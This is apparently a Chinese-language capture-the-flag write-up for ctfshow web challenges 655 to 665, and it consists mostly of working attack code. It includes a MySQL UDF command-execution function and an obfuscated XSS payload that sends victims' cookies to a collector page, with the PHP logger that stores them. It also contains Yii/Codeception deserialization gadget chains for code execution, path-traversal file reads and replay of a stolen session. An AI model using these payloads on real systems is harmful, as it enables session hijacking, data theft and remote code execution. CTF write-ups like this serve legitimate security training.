配合脚本学习效果更佳
web655
打开/etc/host得到内网地址,遍历一遍发现.5的存活e
后台扫描发现有phpinfo.php www.zip robots.txt
访问phpinfo.php直接拿到flag
flag_655=ctfshow{aada21bce99ddeab20020ac714686303}
create function sys_eval returns string soname ‘b.so’;
select sys_eval(‘whoami’);
web656
提示xss,审计index.php发现x-forwarded-for可以,但是xss需要搭在内网上。
随便创一个php页面,内容为
<?php
$parameter = $_SERVER["QUERY_STRING"];
file_put_contents("log.txt",$parameter);
?>
接着在数据库中执行如下语句
select sys_eval('sudo curl --header "X-Forwarded-For:<script>window.location.href=String.fromCharCode(104,116,116,112,58,47,47,49,55,50,46,50,46,49,56,54,46,52,47,115,121,115,116,101,109,51,54,100,47,100,98,47,97,46,112,104,112,63,115,61)+document.cookie;</script>" http://172.2.186.5/index.php?action=login\\&u=7723\\&p=345');
String.fromCharCode中的值是这么来的
s="http://172.2.186.4/system36d/db/a.php?s=" #当然每个人的内网地址可能不一样
a=''
for i in s:
a=a+str(ord(i))+','
print(a)
过一会就可以看到生成了log.txt内容如下
PHPSESSID=f4s2tukhjk4h4s7tm6vodorg6
auth=ZmxhZ182NTY9Y3Rmc2hvd3tlMGI4MGQ2Yjk5ZDJiZGJhZTM2ZjEyMWY3OGFiZTk2Yn0=
auth解码就是flag656
flag_656=ctfshow{e0b80d6b99d2bdbae36f121f78abe96b}
web657
带上cookie去访问就可以得到flag,当然这个cookie一直变,要保证是最新的。
select sys_eval('sudo curl --header "Cookie:PHPSESSID=1mjkpmd6hofo45vnhiobl4of7l;auth=ZmxhZ182NTY9Y3Rmc2hvd3tlMGI4MGQ2Yjk5ZDJiZGJhZTM2ZjEyMWY3OGFiZTk2Yn0=" http://172.2.186.5/index.php?action=main\\&m=getFlag');
flag_657=ctfshow{2a73f8f87a58a13c23818fafd83510b1}
web658
通过yii的反序列化漏洞拿到的
参考链接
文件下载地址https://github.com/opis/closure
<?php
namespace Codeception\Extension{
use Faker\DefaultGenerator;
use GuzzleHttp\Psr7\AppendStream;
class RunProcess{
protected $output;
private $processes = [];
public function __construct(){
$this->processes[]=new DefaultGenerator(new AppendStream());
$this->output=new DefaultGenerator('jiang');
}
}
echo urlencode(serialize(new RunProcess()));
}
namespace Faker{
class DefaultGenerator
{
protected $default;
public function __construct($default = null)
{
$this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
use Faker\DefaultGenerator;
final class AppendStream{
private $streams = [];
private $seekable = true;
public function __construct(){
$this->streams[]=new CachingStream();
}
}
final class CachingStream{
private $remoteStream;
public function __construct(){
$this->remoteStream=new DefaultGenerator(false);
$this->stream=new PumpStream();
}
}
final class PumpStream{
private $source;
private $size=-10;
private $buffer;
public function __construct(){
$this->buffer=new DefaultGenerator('j');
include("closure/autoload.php");
$a = function(){phpinfo();highlight_file('/var/www/html/flag.php');phpinfo();};
$a = \Opis\Closure\serialize($a);
$b = unserialize($a);
$this->source=$b;
}
}
}
flag_658=ctfshow{98555a97cb23e7413d261142e65a674f}
web659
nginx目录穿越漏洞
flag_659=ctfshow{73c4213829f8b393b2082bacb4253cab}
顺便白给了个665
flag_665=ctfshow{35802d184dba134bdc8d0d23e09051f7}
web660
让管理员去访问action=login,他自己会传个flag过去。
然后去日志里面看下。
web661
1=echo file_get_contents("http://172.2.166.5/public../home/flag/secret.txt");
flag_661=ctfshow{d41c308e12fdecf7782eeb7c20f45352}
web662 web663
两个是同一个flag
爆破文件名
1=echo file_get_contents("http://172.2.166.5/public../home/www-data/creater.sh ");
就是说flag663在一个xxx.html中,前缀是三位数的十六进制
flag_663=ctfshow{fa5cc1fb0bfc986d1ef150269c0de197}
web664
<?php
namespace Codeception\Extension{
use Faker\DefaultGenerator;
use GuzzleHttp\Psr7\AppendStream;
class RunProcess{
protected $output;
private $processes = [];
public function __construct(){
$this->processes[]=new DefaultGenerator(new AppendStream());
$this->output=new DefaultGenerator('jiang');
}
}
echo urlencode(serialize(new RunProcess()));
}
namespace Faker{
class DefaultGenerator
{
protected $default;
public function __construct($default = null)
{
$this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
use Faker\DefaultGenerator;
final class AppendStream{
private $streams = [];
private $seekable = true;
public function __construct(){
$this->streams[]=new CachingStream();
}
}
final class CachingStream{
private $remoteStream;
public function __construct(){
$this->remoteStream=new DefaultGenerator(false);
$this->stream=new PumpStream();
}
}
final class PumpStream{
private $source;
private $size=-10;
private $buffer;
public function __construct(){
$this->buffer=new DefaultGenerator('j');
include("closure/autoload.php");
$a = function(){phpinfo();highlight_file('/var/oa/flag664.php');phpinfo();};
$a = \Opis\Closure\serialize($a);
$b = unserialize($a);
$this->source=$b;
}
}
}
flag_664=ctfshow{35802d184dba134bdc8d0d23e09051f7}
web665
看659